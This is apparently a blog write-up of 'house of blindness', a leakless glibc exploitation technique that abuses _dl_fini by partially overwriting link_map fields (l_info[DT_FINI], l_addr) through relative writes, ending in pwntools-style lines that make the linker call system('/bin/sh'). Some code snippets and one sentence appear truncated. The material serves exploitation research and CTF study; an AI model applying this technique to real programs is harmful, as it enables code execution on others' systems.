the solution to google's 7-year problem: popping leakless shells by ripping the runtime dynamic linker open
# issues in exit town
I've recently seen [this](http://binholic.blogspot.com/2017/05/notes-on-abusing-exit-handlers.html?m=1) post discussing and building on research stemming from google's project zero's looks into hacking `exit()`.
It's pretty interesting! The exit function is as ubiquitous as it is hardened. Every program needs to exit, so how libc decides to is important. Bugs form on complex surfaces, and as more things need to be done at exit (like flushing IO and unloading libraries), more complexity is introduced into exiting.
However, `exit` is fairly hardened. Pointer encryption prevents injecting arbitrary addresses into the exit task chain and requires an extremely difficult primitive to achieve: arbitrary read. An arbitrary read is needed not only to calculate libc base but also to leak the TLS xor key required for encrypting pointers. A weaker primitive like libc leak just isn't sufficient like it usually is.
As a result, the research made so far from binholic and project zero is, well, not where it could be. Both rely on powerful primitives to write a generalized exploit against exit, which is unfortunate considering how almost every program which uses libc relies on it. The reduction of these primitives would yield an extremely powerful exploit strategy, one that could work on any program utilizing libc's exit regardless of the actual contents of the program.
The greatest primitive to overcome is the requirement of *leaks*. ASLR has been a hacker's worst nightmare, increasing the complexity of exploits several times over. Many smaller exploit chains have two pieces: gain leak, use the leak to get RCE. libc is designed around forcing hackers to get a leak before they can pwn; just take a look at the recent heap updates in 2.33 which is designed to force getting a leak before the heap could be exploited, stomping out potential hacks before they can show up.
# house of blindness
House of blindness is a new exploit strategy that proves leaks aren't necessary. Its entire premise stems from studying the question of:
> how on earth does `.fini_array` even work?
It's a question even most good pwners couldn't answer. it's not a particularly hard question, it's just that most people don't care. `.fini_array` is a useful gimmick if you can't overwrite the GOT or need an LSB to write on a binary space address, but often its usage in CTF doesn't go beyond a gimmick.
House of blindness isn't a conventional "overwrite `.fini_array` and win" style exploit. Rather, by a few clever partial writes and interesting runtime dynamic linker properties, we can trick the rtld into miscalculating where `.fini` is in memory. The only primitive we need is relative write.
Did I mention we can do this completely leaklessly?
### abusing mmap relativity
Consider the following code:
// get size from user
char *chunk = malloc(size);
// get idx and byte from the user
chunk[idx] = byte;
Although it may not look like it, this allows us to write a byte in libc's memory, without needing leaks! There's a couple things at play here that allows us to do that.
- When size is sufficiently large, instead of returning a chunk from the heap, `malloc` "mmaps" a chunk.
- `idx` can be negative or exceed `size`, meaning that we can write anywhere that's a known offset from the chunk.
- Although two pages mapped by `mmap` isn't neccesarily contigious, they are constant offsets from each other.
Determining these offsets accurately across machines requires a deeper look into how `mmap` works. I go into more depth about how linkers map segments in memory in [this post](https://wip), but for understanding this exploit, all you need to know is that `mmap` chunks, libc, and ld are all consistently spaced.
Knowing this, relative write no longer becomes a stepping stone in achieving arbitrary write, but rather a powerful primitive in it's own right.
### carnage in `_dl_fini`
Our destructor functions, `.fini` and `.fini_array` are both called in `_dl_fini`, a function in `ld.so`. `_dl_fini` is one of the two functions registered to be called at exit, alongside the equally interesting `_IO_cleanup`, but that's an interesting topic for another day.
Let's take a look at how the destructors are called.
/* Is there a destructor function? */
if (l->l_info[DT_FINI_ARRAY] != NULL
|| l->l_info[DT_FINI] != NULL)
/* When debugging print a message first. */
if (__builtin_expect (GLRO(dl_debug_mask)
& DL_DEBUG_IMPCALLS, 0))
_dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
/* First see whether an array is given. */
if (l->l_info[DT_FINI_ARRAY] != NULL)
ElfW(Addr) *array =
(ElfW(Addr) *) (l->l_addr
unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
/ sizeof (ElfW(Addr)));
while (i-- > 0)
((fini_t) array[i]) ();
/* Next try the old-style destructor. */
if (l->l_info[DT_FINI] != NULL)
(l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);
There's a bit to unpack here! `l` is a `link_map`, a data structure that stores a whole lot of data about a specific mapped binary, like the executed binary.
A specific part of the link map is `l_info`, where the information collected from the `.dynamic` section of the ELF lives. Here's an example `.dyamic` section I grabbed from an ELF with Binary Ninja.
![.dynamic section example](https://i.imgur.com/e83WuVR.png)
There are two pieces, a tag and a data value. The tag we're interested in is `DT_FINI`.
#### .fini, old type destructor
/* Next try the old-style destructor. */
if (l->l_info[DT_FINI] != NULL)
(l, l->l_addr + l->l_info[DT_FINI]->d_un.d_ptr);
`l->l_addr` is the base of the loaded executable, where you'd see the ELF header in memory. `l->l_info[DT_FINI]` is a little more interesting. The value of the `DT_FINI` tag is *the offset of the `.fini` section from the start of the binary*. So, to figure out where the `fini` function is, the linker has a pointer to the `DT_FINI` entry in `.dynamic`, `l_info[DT_FINI]`. It'll dereference it when it comes time to get the offset.
Once it does, it'll add the offset from the base address and call `fini`.
How do we exploit this?
#### partial writes on `l_info[DT_FINI]`
Least significant byte writing is a common leakless tactic in pwn. The last 12 bits of any address aren't affected by ASLR, so there's one byte, the least significant byte, which will always be constant. This is because pages are always aligned to 4096-byte boundaries. This isn't any different with our `.fini` offset pointer. What if we did a partial write on the LSB of this pointer, causing the offset to resolve differently? What if, maybe, it resolves to something totally different?
### plan of attack
Let's come up with an exploit plan. If we want a libc address in our sum of `l_addr` and `l_info[DT_FINI]`, one of them needs to be a libc address. We know `l_addr` is a binary space address; no amount of LSB writing will change that. However, the existence of a set of writes that'll get `l_info[DT_FINI]` to point to a libc address is a little more open.
If we can get `l_info[DT_FINI]` to resolve to a libc address, we can write some constant into `l_addr` to shift the resulting pointer around in libc, hopefully to `system`.
This would absolutely ruin the link map after our call, but like, who cares?
#### the adjacency of `.got.plt` and `.dynamic`
We can leverage the adjacency of the `.got.plt` and `.dynamic` to get `l_info[DT_FINI]` to point to an entry in the GOT.
Unfortunately, the `.dynamic` section is big. Like, *way* bigger 256 bytes, meaning just overwriting the LSB isn't enough to take us to the GOT. We'll need to overwrite *two* least significant bytes, which unfortunately introduces 4 bits of brute-force since we only have 12 bits of consistency. Once we do that, we could set up a pretty cool strategy.
# move l_info[DT_FINI] from pointing at _fini offset (0x1298) to read in got (0x7f...)
# change l_addr from binary base (0x5c...) to diffence between system and read
write(ld.main_link_map.l_addr, p64(libc.system - libc.read))
Ignoring how we're going to control `$rdi` to be `/bin/sh` for a second, is there a better way to get a libc address into our calculation without having to guess 4 bits of entropy?
#### refining our exploit with `_r_debug`
However, there doesn't seem to be another way to get a libc address at `l_info[DT_FINI]` without a two-byte write!
That's actually true. However, there's another way. The `.dynamic` section has one more trick up its sleeve, the `DT_DEBUG` entry.
When the linker loads the binary, it provides debuggers with a reference to `_r_debug`, a structure that contains information on the binaries link map.
A pointer in this structure is put inside of the `.dynamic` section for easy access! How convenient. Can we use `_r_debug` as a drop-in replacement for a libc address?
Yes, actually! Even though `_r_debug` isn't in libc, it's in ld, so it's *mmap relative*. Hopefully, we can write some value in
Isn't `ld.so` mapped after `libc.so` though? We can overwrite `l_addr` to some big number `n` so that `.fini` resolves to `_r_debug+n`, but what good is that if `system` is behind `_r_debug`?
Luckily, we have some tools in our toolbelt as pwners to fix this.
#### integer overflows
This isn't a particularly hard bug to force. If we made `l_addr` `0xffffffffffffffff`, we'd resolve to `_r_debug-1` because it only takes one more byte to overflow to the 9th byte, but that'll be thrown out because our registers aren't wide enough to read or write anything larger than 8 bytes.
I go deeper into this behaviour in [this post](https://blog.pepsipu.com/posts/mujs-uiuctf). For our purposes though, packing our offsets as negative fixes this issue pretty neatly!
#### cleaning up
One caveat. Clobbering the link map, specifically `l_addr`, breaks a lot of stuff, mostly after our call. However, `l_addr` is used to call `.fini_array`, so we'll need to null out `l_info[DT_FINI_ARRAY]` for it to not be called.
Another caveat. Even with arbitrary call in libc, using one gadgets can get messy, especially when writing an exploit that should work across all libcs. It's often a lot neater if we can control what `$rdi` points to so we can just called `system` with `/bin/sh`.
To our luck, our destructors are called right after we unlock `dl_load_lock`. The source code details more about this process, but the point is we call `__rtld_lock_unlock_recursive` on a lock in `ld.so` memory. `$rdi` will be a pointer in `ld.so`!
Let's just write `/bin/sh` to our lock. Although there are several issues with writing random data to a mutex that would cause any self respecting concurrency engineer go off on you, for our purposes no one actually asked.
### the exploit
# disable fini array from exec
write(ld.address + link_map + l_info + 8 * DT_FINI_ARRAY, p64(0))
# overwrite l_info[DT_FINI]'s lsb so that it points to _r_debug
write(ld.address + link_map + l_info + 8 * DT_FINI, b"\xb8")
# overwrite l_addr with offset to bring _r_debug to system
ld.address + link_map,
p64(libc.symbols["system"] - ld.symbols["_r_debug"], signed=True),
# fill _dl_load_lock with /bin/sh
write(ld.symbols["_rtld_global"] + _dl_load_lock, b"/bin/sh\x00")
Although this exploit looks like total gibberish without the long and extensive build up associated with it, I think it's very worth it! General exploits are just as useful as they are cool.
### the future
There's still lots of improvement to be made and much room for flexibility. Relative write isn't actually neccesary, weaker primitives would work too!
Consider `global_max_fast` overwrites, which allows us to write a heap pointer anywhere relative to the main area. A similar exploit could be made by forging offsets by making `l_info[DT_FINI]` reference the heap.
Relative byte write isn't neccessary! Unaligned 8 byte writes is more than enough to pull of the exploit, with only needing to overwrite one LSB.
Exiting is not a super big issue either! Forcing an exit by corrupting heap state and triggering heap activity is pretty trivial.
There's a *whole* lot more that we can use such an exploit for. That's what's so great about general exploits, they have a ton of flexibility!